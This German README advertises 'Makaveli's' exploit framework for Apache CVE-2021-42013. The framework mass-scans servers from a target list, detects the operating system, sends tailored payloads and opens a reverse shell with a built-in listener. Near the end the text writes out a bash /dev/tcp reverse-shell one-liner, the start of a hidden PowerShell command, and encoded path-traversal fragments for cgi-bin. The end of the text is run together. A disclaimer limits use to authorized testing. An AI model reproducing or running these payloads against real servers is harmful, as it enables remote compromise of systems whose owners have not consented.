
Ein fortschrittliches Tool zum Scannen, Ausnutzen und zur Ferninteraktion, das entwickelt wurde, um die Apache Path Traversal + RCE Schwachstelle (CVE-2021-42013) in falsch konfigurierten Servern zu erkennen und auszunutzen.
# 🔥 CVE-2021-42013 Exploit Framework by Makaveli
> 💀 Multidimensionaler Kosmischer Hacker-Modus aktiviert...
Ein fortschrittliches Tool zum Scannen, Exploitieren und zur Ferninteraktion, das entwickelt wurde, um die Sicherheitslücke **Apache Path Traversal + RCE (CVE-2021-42013)** auf falsch konfigurierten Servern zu erkennen und auszunutzen.
---
## ⚠️ Rechtlicher Hinweis
> Diese Software wird ausschließlich zu Bildungs- und Forschungszwecken in kontrollierten Umgebungen bereitgestellt.
Die Verwendung dieses Tools gegen Systeme ohne ausdrückliche Genehmigung kann illegal sein und in vielen Ländern eine Straftat darstellen.
Der Autor übernimmt keine Haftung für die missbräuchliche Verwendung dieses Codes. Verwenden Sie ihn auf eigenes Risiko und nur mit ausdrücklicher Erlaubnis des Eigentümers des Zielsystems.
---
🧠 Technische Beschreibung
Dieses Tool ermöglicht:
- ✅ Scannen mehrerer Ziele aus einer `.txt`-Datei.
- ✅ Automatische Erkennung des Vorhandenseins von CVE-2021-42013.
- ✅ Identifikation des entfernten Betriebssystems (Linux oder Windows).
- ✅ Senden maßgeschneiderter Payloads basierend auf dem erkannten System.
- ✅ Aufbau einer Reverse Shell und Erlangen von Remote-Zugriff.
- ✅ Echtzeit-Interaktion mit der Shell über einen integrierten Listener.
- ✅ Erweiterte Logs, Fortschrittsbalken und interaktives Menü.
---
## 🔧 Voraussetzungen
- Python **3.8+**
- Unix/Linux/MacOS-basierte Systeme (Verwendung von `subprocess` und `curl`)
- Erfordert die folgenden Python-Bibliotheken:
```bash
pip install -r requirements.txt
requirements.txt
rich
alive-progress
Außerdem muss curl auf dem Betriebssystem installiert sein.
.
├── POC-CVE.py # Hauptskript
├── logs.txt # Automatisch generierte Logdatei
├── requirements.txt # Python-Abhängigkeiten
└── targets.txt # (Optional) Liste der zu scannenden URLs
python3 POC-CVE.py
Wählen Sie zwischen:
scan_file: Scannt mehrere URLs aus einer Datei und zeigt an, welche anfällig sind.exploit: Direkte Exploitation eines einzelnen Ziels mit Reverse Shell.exit: Beendet den interaktiven Modus.http://example.com
http://victim.net
http://192.168.1.100
python3 POC-CVE.py
Wählen Sie scan_file und geben Sie Folgendes an:
exploit im Menü.LHOST) zum Empfangen der ShellLPORT) für den ListenerDas Skript:
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
powershell -NoP -NonI -W Hidden -Command ...
/.%252e/.%252e/.%252e)curlUser-Agent, Accept, etc.)GET /cgi-bin/.%%32%65/.%%32%65/...Dieses Projekt wird "wie besehen" bereitgestellt, ohne Gewährleistung oder Haftung für Schäden, die durch seine Nutzung entstehen. Scannen oder exploitieren Sie niemals ein System ohne die ausdrückliche Zustimmung seines Eigentümers.
---